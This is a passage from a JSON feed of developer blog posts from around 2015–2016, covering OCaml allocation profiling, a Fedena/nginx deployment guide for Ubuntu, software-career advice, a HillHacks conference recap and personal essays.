libs), for GNU\u002FLinux 2.6.32, not stripped\n\n\nWe can now transfer the file to the Cubietruck and run it. My Cubietruck’s IP\naddress is 192.168.0.9.\n$ scp _build\u002Fhello.native linaro@192.168.0.9:\n$ ssh linaro@192.168.0.9\nWelcome to Linaro 13.04 (GNU\u002FLinux 3.4.61+ armv7l)\n\n* Documentation:  https:\u002F\u002Fwiki.linaro.org\u002F\nLast login: Fri May 20 08:35:01 2016 from 192.168.0.3\nlinaro@cubietruck:~$ .\u002Fhello.native\nHello, Reason!",[],{"slug":2689,"title":2690,"link":2691,"pubDate":2692,"contentSnippet":2693,"tags":2694,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"2015-in-review","2015 in Review","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2016\u002F02\u002F15\u002F2015-in-review\u002F","2016-02-15T00:00:00.000Z","2015 was a good year for me. I accomplished a lot of things, and was happy for most of the year. In no particular order, here are the things that stand out for me:\nWent to HillHacks, and made lots of friends. Helped organize the conference.\nJoined Razorpay in June\nMoved to Bangalore\nAnnounced my book, The Joy of Software Development\nDid lots of speaker things:\n    \nJoy of Software Development talk at IIT Roorkee\nFlash Talks on SDSLabs, CTFs and a few more things at HillHacks\nA full-length talk on the book itself at HillHacks\nDid the HillHacks and HackBeach quizzes\nAnnounced my Homeopathy Bug Bounty Program at hackbeach.\nGave a talk on Fun with HTTP at Barcamp Bangalore.\nLearnt some slacklining at hackbeach. Helped with conference scheduling as well.\nMade lots of new friends in Bangalore.\nStarted playing board games, including being a DM at several Dungeons and Dragons sessions.\nStarted quizzing in Bangalore as well. Mostly at Cluesday, Vapors.\nReading\nI started with a goal of 20 books for the year, and ended up reading about 28. Tried experimenting with audiobooks near the year’s end, and failed. Bought a Kindle Paperwhite as well. I tend to read a lot of Fantasy and SF, and this continued in 2015 as well. The best books I read this year (in order):\nLions of Al Rassan [review]\nThe Goblin Emperor [review]\nThe Martian [review]\nA complete list is on Goodreads\nTech\nLaunched hackercouch as a personal project.\nShifted to an Arch Linux + i3wm setup for my laptop. 
See the Setup page for more details.\nLeft Facebook, mostly because of their stance on Net Neutrality and the FreeBasics debacle in India.",[],{"slug":2696,"title":2697,"link":2698,"pubDate":2699,"contentSnippet":2700,"tags":2701,"maintainerName":202,"maintainerUsername":203,"maintainerPhoto":204,"feedUrl":205},"fear-of-success-grounds-failure","Indian startups ecosystem: Fear of failure grounds our success story","https:\u002F\u002Fnadh.in\u002Fblog\u002Ffear-of-success-grounds-failure\u002F","Sat, 26 Dec 2015 00:00:00 +0000","The Indian startup ecosystem has taken shape and exploded in the last few years, and so have the countless stories surrounding it. Unsurprisingly, lessons from unsuccessful ideas and attempts haven’t gotten as much precedence as their successful counterparts.",[],{"slug":2703,"title":2704,"link":2705,"pubDate":2706,"contentSnippet":2707,"tags":2708,"maintainerName":1639,"maintainerUsername":1640,"maintainerPhoto":77,"feedUrl":1641},"deploying-fedena-using-ubuntu-14-04-html","Deploying Fedena Using Ubuntu 14.04","https:\u002F\u002Faboobacker.in\u002F2015\u002F11\u002F18\u002Fdeploying-fedena-using-ubuntu-14-04.html","2015-11-18T04:00:13.000Z","Install Ruby Dependencies\n\nsudo apt-get update\nsudo apt-get install git-core curl zlib1g-dev build-essential libssl-dev libreadline-dev libyaml-dev libsqlite3-dev sqlite3 libxml2-dev libxslt1-dev libcurl4-openssl-dev python-software-properties\n\n\nInstall Ruby Using RVM\n\nsudo apt-get install libgdbm-dev libncurses5-dev automake libtool bison libffi-dev\ncurl -L https:\u002F\u002Fget.rvm.io | bash -s stable\nsource ~\u002F.rvm\u002Fscripts\u002Frvm\necho \"source ~\u002F.rvm\u002Fscripts\u002Frvm\" >> ~\u002F.bashrc\nrvm install 1.8.7\nrvm use 1.8.7 --default\nruby -v\n\n\nSetting up the MySQL server\nFedena uses MySQL, so run:\n\nsudo apt-get install libmysqlclient-dev mysql-server\n\n\nDo remember the MySQL password you set during this step; it is required later.\nChecking out a modified version of Fedena\nI made some modifications to Project Fedena to make it easily installable.\n\n\ngit clone https:\u002F\u002Fgithub.com\u002Ftachyons\u002Fproject_fedena.git\ncd project_fedena\ncp config\u002Fdatabase.yml.example config\u002Fdatabase.yml\nbundle install\nrake db:create\nbundle exec rake fedena:plugins:install_all\n\n\nInstalling Passenger and nginx\n\n# Install passenger PGP key and add HTTPS support for APT\nsudo apt-key adv --keyserver hkp:\u002F\u002Fkeyserver.ubuntu.com:80 --recv-keys 561F9B9CAC40B2F7\nsudo apt-get install -y apt-transport-https ca-certificates\n\n# Add passenger APT repository\nsudo sh -c 'echo deb https:\u002F\u002Foss-binaries.phusionpassenger.com\u002Fapt\u002Fpassenger trusty main > \u002Fetc\u002Fapt\u002Fsources.list.d\u002Fpassenger.list'\nsudo apt-get update\n\n# Install Passenger + Nginx\nsudo apt-get install -y nginx-extras passenger\n\n\nEdit \u002Fetc\u002Fnginx\u002Fnginx.conf and uncomment passenger_root and passenger_ruby. 
For example, you may see this:\n\n# passenger_root \u002Fsome-filename\u002Flocations.ini;\n# passenger_ruby \u002Fusr\u002Fbin\u002Fpassenger_free_ruby;\n\n\nRemove the ‘#’ characters, like this:\n\npassenger_root \u002Fsome-filename\u002Flocations.ini;\npassenger_ruby \u002Fusr\u002Fbin\u002Fpassenger_free_ruby;\n\n\nNow you can validate the installation using the command\n\nsudo passenger-config validate-install\n\n\nNow create an entry in \u002Fetc\u002Fnginx\u002Fsites-enabled\n\nsudo vim \u002Fetc\u002Fnginx\u002Fsites-enabled\u002Fproject_fedena\n\n\nNow modify and paste the following text, i.e., edit your server name and project path\n\nserver {\n    listen       80;\n    server_name  fedena.example.com;\n    location \u002F {\n    \troot   \u002Fyour\u002Ffedena\u002Fdirectory\u002Fpublic;\n     \tpassenger_enabled on;\n    }\n    error_page   500 502 503 504  \u002F50x.html;\n    location = \u002F50x.html {\n        root   html;\n    }\n  \terror_page 413 \u002F413.html;\n   \tlocation = \u002F413.html{\n       root   html;\n       allow all;\n    }\n }\n\n\n\nYou can verify the above configuration by adding 127.0.1.1\tfedena.example.com in \u002Fetc\u002Fhosts\nNow restart the nginx server and check fedena.example.com\n\nsudo service nginx restart\n\n\nReferences\nhttps:\u002F\u002Fwww.phusionpassenger.com\u002Flibrary\u002Finstall\u002Fnginx\u002Finstall\u002Foss\u002Ftrusty\u002F\nhttp:\u002F\u002Faboobacker.in\u002Finstalling-project-fedena-in-14-04\u002F",[],{"slug":2710,"title":2711,"link":2712,"pubDate":2713,"contentSnippet":2714,"tags":2715,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"profiling-the-stack","Profiling the stack","https:\u002F\u002Fkcsrk.info\u002Focaml\u002Fprofiling\u002F2015\u002F10\u002F27\u002Fprofiling-the-stack\u002F","2015-10-27T17:29:30.000Z","In the last\npost,\nI described a flat allocation profiler for the OCaml 4.02 bytecode interpreter.\nIn this post, I’ll describe further developments which add support for call\nstack information and better location information. Let’s dive straight into the\nusage:\nEnabling stack profiling\nStack profiling is enabled by setting the environment variable\nCAML_PROFILE_STACK to the intended stack depth. If we would like to\nattribute any allocation to the current function, we would set\nCAML_PROFILE_STACK=1. To do the same for the current function and its caller,\nwe would set CAML_PROFILE_STACK=2. CAML_PROFILE_STACK=\u003CINFINITY> should\ngive you a stack profile all the way down to the first function.\nWhy should I care about the stack depth?\nBecause it affects program performance: enabling stack profiling walks the\nstack on every allocation, which can slow the program down severely.\nMost often, with a flat profile, you’ve tracked the\noffending allocation to some function in the standard library such as1:\nFile \"bytes.ml\", line 59, characters 7-81:\n  C_CALL1 caml_create_string\n\nFile \"src\u002Fbigstring.ml\", line 98, characters 20-37:\n  C_CALL1 caml_create_string\n\n\nAnd all you want is to find out the caller of that standard library function in\nyour code. 
A small stack depth should provide this information.\nYou might have to play around with the stack depth to identify what you are\nlooking for.\nProfiling N-queens\nYou can obtain and install the profiling-enabled OCaml 4.02\nhere.\nLet us obtain the flat profile first.\n$ wget http:\u002F\u002Fcaml.inria.fr\u002Fpub\u002Fold_caml_site\u002FExamples\u002Foc\u002Fbasics\u002Fqueens.ml\n$ ocamlc -o queens -g queens.ml\n$ CAML_PROFILE_ALLOC=queens.preprof .\u002Fqueens\nChess boards's size ? 8\nThe 8 queens problem has 92 solutions.\n\nDo you want to see the solutions \u003Cn\u002Fy> ? n\n$ .\u002Ftools\u002Fallocprof queens.preprof queens.prof\n$ head -n10 queens.prof\nTotal: 77,863 words\nInstr   Words   % of total      Location\n-----   -----   ----------      --------\n2488    31440   40.38%          file \"list.ml\", line 55, characters 32-39\n27681   31440   40.38%          file \"queens.ml\", line 61, characters 46-52\n27775   5895    7.57%           file \"queens.ml\", line 38, characters 2-113\n27759   4112    5.28%           file \"queens.ml\", line 40, characters 33-41\n27687   3930    5.05%           file \"queens.ml\", line 61, characters 14-59\n2403    86      0.11%           file \"pervasives.ml\", line 490, characters 8-63\n5391    44      0.06%           file \"list.ml\", line 20, characters 15-29\n\n\nObserve that we now have the precise location information directly in the\nprofile, whereas\nearlier\none had to manually identify the source location using the instruction\ninformation. In this profile, we see that most allocations were in\nlist.ml:55, which is the List.map function. However, we cannot pin down the\nsource of these allocations in queens.ml from this profile since the profile\nis flat. Let us now obtain the stack allocation profile, which will reveal the\nsource of these allocations in queens.ml.\n$ CAML_PROFILE_ALLOC=queens.preprof CAML_PROFILE_STACK=10000 .\u002Fqueens\nChess boards's size ? 8\nThe 8 queens problem has 92 solutions.\n\nDo you want to see the solutions \u003Cn\u002Fy> ? n\n$ .\u002Ftools\u002Fallocprof queens.preprof queens.prof --sort-stack\n$ head -n10 queens.prof\nTotal: 77,863 words\nInstr   Current Cur %   Stack   Stack % Location\n-----   ------- -----   -----   ------- --------\n27836   0       0.00%   76911   98.78%  file \"queens.ml\", line 100, characters 33-42\n27549   0       0.00%   76870   98.72%  file \"queens.ml\", line 85, characters 17-36\n27466   0       0.00%   76473   98.21%  file \"queens.ml\", line 45, characters 18-31\n27715   0       0.00%   65117   83.63%  file \"queens.ml\", line 62, characters 4-22\n27694   0       0.00%   62880   80.76%  file \"queens.ml\", line 61, characters 31-59\n2487    0       0.00%   55020   70.66%  file \"list.ml\", line 55, characters 32-39\n2483    0       0.00%   31440   40.38%  file \"list.ml\", line 55, characters 20-23\n\n\nI’ve chosen a stack depth of 10000 to obtain the complete stack profile of the\nprogram. The option --sort-stack to allocprof sorts the results based on\nthe stack allocation profile. We can now clearly see the stack of functions\nthat perform most allocations. The line\n27836   0       0.00%   76911   98.78%  file \"queens.ml\", line 100, characters 33-42\n\n\nsays that 98.78% of all allocations were performed by the function at\nqueens.ml:100, characters 33-42, and its callees. This isn’t surprising since\nthis function is the top-level main\nfunction!\nMore interesting is the 98.21% of allocations on queens.ml:45. 
This is the\nrecursive call to the concmap\nfunction,\nwhich in turn invokes the List.map function on queens.ml:61. We’ve now\npinned down the source of the allocations in list.ml:55 to queens.ml:61.\nCaveats and conclusions\nUnlike stack profiles of C programs, OCaml’s stack profile does not include all\nthe functions in the call stack since many calls are in tail positions. Calls\nto functions at tail positions will not have a frame on the stack, and hence\nwill not be included in the profile.\nPlease do submit issues and bug-fixes. Pull-requests are welcome! Also, here is\nmy trimmed down (yay \o\u002F!), non-exhaustive wish list of features:\nDump the profile every few milliseconds to study the allocation behavior of\nprograms over time.\nSave the location information in the object\nheader\nand dump the heap at every GC to catch space leaks.\nThanks to trevorsummerssmith for the example. ↩",[],{"slug":2717,"title":2718,"link":2719,"pubDate":2720,"contentSnippet":2721,"tags":2722,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"get-better-at-software-development","How to get better at software development?","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2015\u002F10\u002F12\u002Fget-better-at-software-development\u002F","2015-10-12T00:00:00.000Z","I often get a lot of queries from people asking me how to get started with software development, and how to get better at it. My replies are almost at copy-paste stock level now, so I thought I might as well write about it publicly.\nWhat follows is a list of advice I’d give to any person who wants to write software for a living. A lot of it might apply across professions, and a lot of it is tailored to students in universities. Not everything might apply in your case, YMMV. Take everything with a pinch of salt. Feedback is welcome.\nJoin a community.\nHighly preferable if it’s an IRL (in-real-life) community rather than just a chatroom somewhere, but even those are preferable over nothing. Communities have this shared sense of learning that you don’t enjoy anywhere else. Passive learning is something I talk a lot about, and it only happens because of chance interactions that happen in communities. Even online communities work fairly well, and by online communities I mean places like StackOverflow, AskUbuntu, ServerFault, HackerNews, subreddits etc.\nIf you don’t have a physical community near you that you can join, maybe it’s time to start one?\nContribute to Open Source projects\nIt doesn’t have to be with your code, or even a large project. Even small JavaScript npm modules that you might think can be improved deserve some Pull Request love.\nWrite all code publicly\nYour code not being public should be the exception, not the norm. I’ve found putting almost all my code on GitHub fairly liberating. I keep all my OS configuration and a lot of other things on GitHub.\nDo tech talks\nIt doesn’t have to be at a big-name conference; maybe at a small meetup around you. Good conferences will sponsor your tickets, and as a plus, you get to attend all the talks at that conference for free. 
Just make sure that you actually do know what you’re talking about, unlike a lot of talks that happen.\nThe level of knowledge expected of a speaker is far higher, and as a result, if you are the one talking about something, you need to get better at it and understand it better, which is a great way of forcing yourself to learn something.\nStay Updated\nReading Hacker News is a fairly certain way of making sure of that. A person doing PHP development should be aware of things like Composer, HHVM, and perhaps the upcoming changes in PHP7 (they’re awesome). As a technologist, part of our job is to stay updated with trends (no matter how insane the JS framework wars sound). The code you will be writing 5 years from now will be in an entirely different framework than what you are using today. This doesn’t mean that you should start learning the ins and outs of every JS framework, but rather that you should be tangentially aware of developments happening in the space. (For example, following stable updates of Rails even though you are not a Rails developer.)\nLearn more languages\nI am a proud polyglot, and I very often realize that knowing more than one language changes your style and, more importantly, your thinking process significantly. For example, a Ruby programmer will be fairly comfortable with the idea of metaprogramming compared to a PHP developer, and even more so when it comes to DSLs (Domain Specific Languages). Similarly, knowing Haskell or Functional Programming in general teaches you a lot of things that you might re-use back in your JavaScript world.   \nConcepts Matter\nI was asking people about good interview questions, and one that I really liked was “How do you write an HTTP server using sockets?”. A lot of developers are stuck in this moat of “programming = software development”. And you can’t get over that unless you start thinking in terms of concepts. This is not me trying to get people to become Architecture Astronauts, but me trying to get people to understand how things work.\nI’ve interviewed people who have no idea about how HTTP works, and in my opinion you can’t really be a web developer without knowing HTTP. A fairly good filter for good web developers is whether they know the ins-and-outs of HTTP. And HTTP is not a programming challenge, but rather a conceptual problem.\nSimilarly, if you work in the frontend and you don’t know what the Same Origin Policy is, I am not gonna hire you. (“Is it implemented on the browser or the server?” is another good question.) The point I’m trying to make is that you need to get a layer above your language’s standard library and understand how things work. Learning ActiveRecord is awesome, but do you understand how it works?\nShip Products\nDoesn’t matter if they are small, or made in a hackathon. As long as it’s shipped, we’re cool. If it’s not, come back when you’ve shipped it.\nHave side projects\nThis is slightly harder to do, but far more rewarding. Make sure that your side-project is not something you expect to make money out of, and that it has a fairly reasonable scope. Side projects are an excellent breeding ground for you to try out new technologies, and play around with new languages. It’s a really good breakaway from work things as well.\nRead technical books\nAs a start, I’d recommend everything that codinghorror has suggested here and here. There are a lot of good books listed on hackershelf.com as well. 
My personal favorite is Don’t Make Me Think, which is a book on Web Usability and something I think every developer and designer should be forced to read.\nThanks to Shashank Mehta for discussing these ideas\nwith me and helping me frame this post.",[],{"slug":2724,"title":2725,"link":2726,"pubDate":2727,"contentSnippet":2728,"tags":2729,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"bytecode-allocation-profiler","An Allocation Profiler for OCaml Bytecode Interpreter","https:\u002F\u002Fkcsrk.info\u002Focaml\u002Fprofiling\u002F2015\u002F09\u002F23\u002Fbytecode-allocation-profiler\u002F","2015-09-23T09:51:30.000Z","This post describes a simple flat allocation profiler for the OCaml 4.02 bytecode\ninterpreter.\nOCaml is a strongly typed functional language with automatic memory management.\nAutomatic memory management alleviates the need to manually deal with\nmemory management, and by construction, avoids a large class of bugs. However,\nabstractions are not free in OCaml. Unlike MLton, a\nwhole-program optimizing Standard ML compiler, which I used to hack on in an\nearlier life, in OCaml one\nneeds to be particularly aware of the cost of introducing abstractions such as\nhigher-order functions and modules. This is often at odds with desirable\nprogramming patterns one tends to embrace in a higher-order modular functional\nlanguage. Writing performance-sensitive code in OCaml remains a skill that is\nacquired gradually through experience.\nThere are, of course, excellent\nresources\navailable\nto understand the performance implications of OCaml abstractions. However,\noftentimes I simply need a way to profile and uncover performance bottlenecks\nin my program before I can apply any targeted optimizations. Profiling along\nthe following three axes is particularly useful: time, counts and\nallocations. OCaml has good support for two of\nthese. While ocamlcp\nwith ocamlprof gives you a count profile, one can use the standard Unix\nprofiler gprof for time profiling. However, these do not necessarily help\nwith identifying the cost of abstractions, for which one needs an allocation\nprofiler1.\nThe state of allocation profiling in OCaml\nWhile an allocation profiler is not part of the standard OCaml distribution,\nseveral alternatives do exist. Memprof from\nOCamlPro provides a “non-intrusive memory profiler\nfor OCaml applications”, with a simple online version and a commercial version\nwith fine-grained tracing. Mark Shinwell has an allocation profiler for OCaml\n4.02 native\ncode programs generated by ocamlopt. Unfortunately, neither of these options\nwas suitable for me as Multicore\nOCaml currently only supports\nbytecode compilation, and has a\nmarkedly\ndifferent\nGC. So I decided to implement my\nown for the multicore\ncompiler.\nSince the allocation profiler will be useful in general, I have also ported it\nto OCaml 4.02.\nThis post talks about the vanilla OCaml allocation profiler.\nBytecode allocation profiler\nThe idea of this allocation profiler is to record the allocations and associate\nthem with the position in the code where the corresponding block or closure was\nallocated. In particular, we do not record the call stack that led to the\nallocation point, which would have provided us a more accurate picture. One can\nget pretty far with just the flat profile.
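To make the flat-profile idea concrete, here is a tiny, hypothetical example (the function names are illustrative and not taken from the profiler or this post):\nlet make_pairs xs =\n  (* Every tuple and cons cell allocated by this List.map is attributed to\n     this allocation site in a flat profile, regardless of which caller\n     triggered it. A stack profile would additionally split the counts\n     between from_a and from_b. *)\n  List.map (fun x -> (x, x)) xs\n\nlet from_a () = make_pairs [1; 2; 3]\nlet from_b () = make_pairs [4; 5; 6]\n\nlet () = ignore (from_a ()); ignore (from_b ())\n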
Running the bytecode program under\nthe modified interpreter produces a profile, which is then analyzed offline.\nThe bytecode interpreter of OCaml is remarkably simple, as is the patch for the\nallocation profiler. In this section, I will detail the implementation of the\nprofiler. If you are interested in just using the profiler, do skip right to\nthe instructions.\nWhen the bytecode is loaded by the interpreter in\ncaml_load_code,\nit allocates an array for the bytecode. caml_start_code points to the start\nof this array. The program counter\npc\nis a pointer into this array. We maintain a distinct code pointer\nprofile_pc\nthat always points to the instruction and never its operands. The offset of\nprofile_pc from caml_start_code uniquely identifies an instruction in the\nbytecode executable. We will use this offset to record the allocation points.\nWe allocate an array\ncaml_profile_counts\nof unsigned integers whose length is equal to the length of the code, into\nwhich we will store the allocation counts. There are two main ways in which\nOCaml allocates memory:\nAlloc_small\nfor allocating in the minor heap, and\ncaml_alloc_shr\nfor allocating in the major heap. We modify both to record the allocations at a\ngiven instruction. We modify\ninterp.c\nto update profile_pc for instructions which potentially allocate. Allocations\nfor arrays and strings are performed in their corresponding C functions through\ncaml_alloc.\nSuch allocations are covered by recording the instruction in\nSetup_for_c_call.\ncaml_alloc_shr is also used by the GC for promoting live minor heap objects\nto the major heap at the end of a minor GC cycle. Allocations by the GC are ignored by\nresetting profile_pc to NULL before minor collections. Hence, the profiler\nonly counts allocations by the mutator. Finally, the interpreter outputs the\nprofile\nat the end of execution of the program.\nUsing the profiler\nIn order to use the profiler, compile the OCaml programs with the bytecode\ncompiler ocamlc with the -g option to record the debugging information. This\nwill be used to interpret the profile. When using ocamlbuild it is necessary\nto compile and link with -g (with -cflag -g -lflag -g).\nFirst, get OCaml 4.02 with the allocation profiler, and build it using\nopam-compiler-conf:\n$ git clone https:\u002F\u002Fgithub.com\u002Fkayceesrk\u002Focaml\n$ cd ocaml\n$ git checkout 4.02-profile-alloc\n$ opam compiler-conf configure\n$ make world.opt\n$ opam compiler-conf install\n\n\nLet us profile the Eight\nQueens\nprogram. Profiling is enabled by setting CAML_PROFILE_ALLOC to the output\nfilename of the profile.\n$ wget http:\u002F\u002Fcaml.inria.fr\u002Fpub\u002Fold_caml_site\u002FExamples\u002Foc\u002Fbasics\u002Fqueens.ml\n$ ocamlc -o queens -g queens.ml\n$ CAML_PROFILE_ALLOC=queens.preprof .\u002Fqueens\nChess boards's size ? 8\nThe 8 queens problem has 92 solutions.\n\nDo you want to see the solutions \u003Cn\u002Fy> ? n\n$ .\u002Ftools\u002Fallocprof queens.preprof > queens.prof\n$ head -n5 queens.prof\nTotal: 80,433 words\nInstr   Words   % of total\n-----   -----   ----------\n2488    31440   39.09%\n27681   31440   39.09%\n\n\nallocprof is a small Python script that post-processes the profile. The\npost-processed profile shows the total number of words allocated, and is\nfollowed by the instruction number, words allocated and the percentage of total\nallocation that it represents.
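As an aside, the usual suspects in such profiles are the list functions; as a reminder of why, here is a sketch equivalent to the standard list append (illustrative background only, not output from the profiler):\nlet rec append l1 l2 =\n  match l1 with\n  | [] -> l2\n  (* one fresh cons cell is allocated per element of the left operand,\n     so appending inside a loop allocates quadratically *)\n  | x :: xs -> x :: append xs l2\n\nlet () = assert (append [1; 2] [3] = [1; 2; 3])\n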
The instruction number can be linked back to the\nsource code by dumping the bytecode executable with dumpobj.\n$ .\u002Ftools\u002Fdumpobj queens > queens.dumpobj\n$ vim queens.prof queens.dumpobj queens.ml\n\n\n\nWe can see that the program spent 39.09% of its allocations appending to lists\nin queens.ml line 61. For the curious, the other 39.09% was spent in the\nList.map function.\nDealing with early termination\nThe profiler ordinarily writes out the profile at normal program\ntermination, when the interpreter has run to completion. However, programs may\nterminate early by explicitly invoking exit. In such cases, the runtime does\nnot get a chance to output the profile. Hence, a function output_profile: unit\n-> unit is provided to explicitly request the profile to be written out to the\nfilename provided in CAML_PROFILE_ALLOC. The following example illustrates\nthe use case in a program that uses the Async library:\n(* foo.ml *)\nopen Core.Std\nopen Async.Std\n\nlet main () =\n  printf \"Hello!\\n\";\n  (* Without this call, profile isn't written out *)\n  output_profile ();\n  return ()\n\nlet () =\n  Command.async_basic\n    ~summary:\"foo\"\n    Command.Spec.(empty)\n    main\n  |> Command.run\n\n\nThe program is compiled and run as follows:\n$ ocamlbuild -use-ocamlfind foo.byte -package core -package async -tag thread -tag debug\nFinished, 3 targets (0 cached) in 00:00:00.\n$ CAML_PROFILE_ALLOC=foo.preprof .\u002Ffoo.byte\nHello!\n$ ls foo.preprof\nfoo.preprof\n\n\nThanks to trevorsummerssmith for the\nmotivation and the example.\nConclusion\nThe allocation profiler has been quite useful for optimizing small programs. It\nwould be interesting to see whether it scales to larger ones. Also, here is my\n(non-exhaustive) wish list of features:\nImprove tooling. Avoid the need to manually search through text files.\nRecord stack allocation. This is especially important in multicore OCaml\n  since stacks are heap allocated.\nRecord the call stack information for allocations to get an informative profile.\nDump the profile every few milliseconds to study the allocation behavior of\n  programs over time.\nSave the location information in the object\n  header\n  and dump the heap at every GC to catch space leaks.\nProfiling for time does give you the time that the program spends in garbage collection functions such as minor GC cycles and major GC slices, but it is not helpful for pinpointing allocation bottlenecks. ↩",[],{"slug":2731,"title":2732,"link":2733,"pubDate":2734,"contentSnippet":2735,"tags":2736,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"ocaml-experimental-compilers","Experiment with OCaml Multicore and Algebraic Effects","https:\u002F\u002Fkcsrk.info\u002Fmulticore\u002Fopam\u002Focaml\u002F2015\u002F09\u002F10\u002Focaml-experimental-compilers\u002F","2015-09-10T13:11:00.000Z","I recently gave a talk on Algebraic Effects in OCaml at the OCaml Workshop\n2015. The extended abstract and the\nslides from the talk are available here. The slides\nshould provide a gentle introduction to programming with algebraic effects and\nhandlers in OCaml. The examples from the talk (and many more!) are available\nhere.\nAlgebraic effects in OCaml are available as a part of multicore OCaml.
The\nexperimental compiler can easily be installed using the OCaml Labs opam\ndevelopment repo.\n$ opam remote add ocamllabs -k git https:\u002F\u002Fgithub.com\u002Focamllabs\u002Fopam-repo-dev\n$ opam switch 4.02.2+multicore\n\n\nIf you are interested in contributing, please do experiment with algebraic\neffects, and report any inevitable bugs or feature requests to the multicore\nOCaml issue tracker.\nWe are also quite interested in hearing about interesting applications of algebraic\neffects such as the encoding of monadic\nreflection\nand one-shot multi-prompt delimited\ncontrol.\nFeel free to submit pull requests with your examples.",[],{"slug":2738,"title":2739,"link":2740,"pubDate":2741,"contentSnippet":2742,"tags":2743,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"hillhacks","HillHacks 2015","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2015\u002F07\u002F20\u002Fhillhacks\u002F","2015-07-20T00:00:00.000Z","A little while back, I came across HillHacks, a conference in Dharamshala about “hacking and making in the Himalayas”. I was instantly hooked. It took a lot of scheduling trouble, but I decided to stay for the entire unconference, which started on 23rd May.\nIt’s hard to describe the HillHacks experience in a single blog post. I met so many amazing people from all over the world. Learned a lot of different things. I had a lot of fun teaching some other things. I helped organize some of the stuff, and managed to stay awake an entire night while participating in a CTF. And on top of that, got to eat delicious food.\nHillHacks, as an event, was divided into two segments:\nAn unconference (23rd May - 3rd June)\nMain Conference (4-7 June)\nA lot of people had arrived before me at the venue and taken care of the basic infrastructure. We had internet connectivity via two local ISPs. We had IPv6 connectivity via a tunnel in Belgium as well.\nThere were a lot of fun activities planned every day: from unicycling to skateboarding and playing Cards against Humanity; it was a lot of fun living with so many strangers and trying to figure out ways to help.\nI did a talk on SDSLabs, a quiz for everyone, and an introductory session on CTF contests. We then participated in a CTF organized in Germany as Team HillHacks. On the last day of the conference, I did a talk on “The Joy of Software Development”, which is a book I am working on.\nFor the first time in my life, I met people who actually use BSD. And to make it even more amazing, I met NetBSD Kernel developers, people on the BSD Security Team, and people who prefer OpenBSD over NetBSD (I’d never really cared for the distinction, as a Linux user).\nWe did a lot of hacks, including running an MPD Daemon and streaming it over IceCast. I also spent a lot of time cubing and teaching people how to solve Rubik’s Cubes. My times have also improved somewhat as a result. Thanks to trouble, I also learnt how to solve a MegaMinx.\nAs part of the School Outreach program (organized by the brilliant Tink), we taught kids about Codes and Ciphers, programming, speedcubing and lots of other things. The kids also performed in the final Gala Show, giving us brilliant performances in 3 different plays (all 3 schools had their own plays).\nI learned a lot of different things: how to start with Kernel Programming, DNSSEC, Retro Gaming. Thanks to a few dedicated volunteers, we even made an 8-inch telescope that made staring at the night sky so much fun.
We had a session on Typography, a storytelling session in Malayalam (translated to English on the fly). I even learnt a bit of Emacs.\nThe list is so long, I don’t think I can do it justice in this single blog post.\nThe most amazing part was not the technical things, but the community itself. sva would often say that every one of us has “sudo access on the conference” (geekspeak for full authority). Each of us helped organize it, any way we could. The community got together to set up the stage, tents, network and the entire infrastructure at HillHacks. Zainab even has a blog post on social cooking at Hillhacks.\nAs I sit here at the venue, it has been 2 weeks of fun and awesomeness here at HillHacks. I leave with lots of memories and hope to be here next year.\nIf this blog post interests you, be sure to check out hackbeach as well. We are doing a mini-conference around November in Kovalam.",[],{"slug":2745,"title":2746,"link":2747,"pubDate":2748,"contentSnippet":2749,"tags":2750,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"on-writing","Thoughts on Writing","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2015\u002F06\u002F07\u002Fon-writing\u002F","2015-06-07T00:00:00.000Z","I have always wanted to be a writer. I think secretly we reader-folk all have that ambition. The joy of getting across your thoughts to another person without ever having met them is enormous.\nMost of my writing time these days is spent over email, chat or my not-so-frequent blog posts. I tend to do a lot of research while writing, and it takes up a lot of time. As such, my writing output tends to be diminutive compared to what I’d like.\nHowever, if you go through my blog posts and emails, I write a lot about trivial things. Things that many people have already written about. Things that have probably been discussed to death, and where I have very little chance of actually coming up with something new.\nShould I still go ahead and write about it?\nThis question has been bugging me for a while, especially as a blogger. I mostly write on technical topics these days. For instance, I have given talks on Software Development, UX Design, and even Bitcoin. I am nowhere close to being an authority on any of these things. Even in my specialized field of Web Development, there are so many things that I’m only barely aware of. So many things I am yet to even form my own opinions about. Topics I don’t even know exist.\nWhen I go and read an article about Software Development from Joel Spolsky, or an article on Security by Bruce Schneier, or something on Startups by Paul Graham, or tptacek on Hacker News, I instantly sit back and take notice: I know their credentials and the fact that they are speaking authoritatively on the topic. However, what can I, a meager undergrad with almost zero experience, write on such topics? Why should I even try, when there are people who understand these things a thousand times better than me?\nIn retrospect, this sounds quite similar to Imposter Syndrome, and I’m not sure if this is exactly the same thing. I don’t get a feeling that I’m a fraud. I totally understand my own capabilities and successes, but the mere fact that there are people far better at what I’m doing is enough to dishearten me.\nI’ve given this a lot of thought.
A really good summary of my response is in the following answer by James Erwin, author of Rome Sweet Rome, in a reddit AMA, to a question asking for writing advice:\nAnd if you’re going to write, write what you want to write. The odds against any creator are insane. If you’re going to devote months of your time, don’t let it be for an idea you think will sell. Odds are it won’t. Write something you want to write, or need to write. Write for yourself before anyone else. I’d rather read someone who is excited and passionate about what they want to say than someone who’s obviously trying to say what they think I want to hear.\n— James Erwin\nI write, despite all these doubts, for the following reasons:\nSelf-learning. A blog is an excellent way to keep track of your self-learning. It’s amazing to come back a few years later and see the things you were struggling with before. It’s equally amazing to do a trivial Google search for an issue you face and find your own blog post or StackOverflow answer on the same.\nSharing Knowledge. Yes, there are people who might know it better, but that shouldn’t mean I should keep my knowledge to myself. That would go against all the values that I stand for.\nNetwork Effect: Not in the strictest sense of the word, but my friend Shashank recently brought this up. I have a circle of people who know me and would vouch for my credentials. For the same reason, they are more likely to trust me as a source, instead of a third person of whom they have no knowledge.\nI love writing. The mere process of putting words down is enchanting for me.\nThe next question that arises is: “What should I write about?”. Ruling out 